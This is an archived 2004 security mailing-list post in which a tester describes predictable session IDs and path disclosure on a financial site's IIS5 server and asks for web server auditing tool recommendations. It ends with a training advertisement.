Web site testing

From: Jerry Shenk (jshenk@decommunications.com)
Date: Thu Apr 22 2004 - 16:09:08 EDT


I've got a web site that I'm pretty sure has some holes and I've
reported the problems I've seen but the developer doesn't seem to be
getting things fixed...seems that they need a little more evidence to
prove that there's a problem and I'm supposed to find that.

It's a financial web site that uses session IDs that are a mix of the
user id and the seconds since midnight to the thousandth of a second
(ie. Very predictable). The server (IIS5) will also readily give up the
current time. A predictable session ID is a bad thing but I'm not sure
quite how to prove that.

The server is also installed on the C: drive. If I mess up some of the
form data correctly, and submit the page, it will respond with a
directory where the file doesn't exist. This new SSL vulnerability will
probably give a chance to prove that installing a web server on the C:
drive is a bad idea 'cuz something will eventually come up.

What are some good web server auditing tools.

------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors.
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the skills
of an Ethical Hacker to better assess the security of your organization.
Visit us at:
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
-------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:52 EDT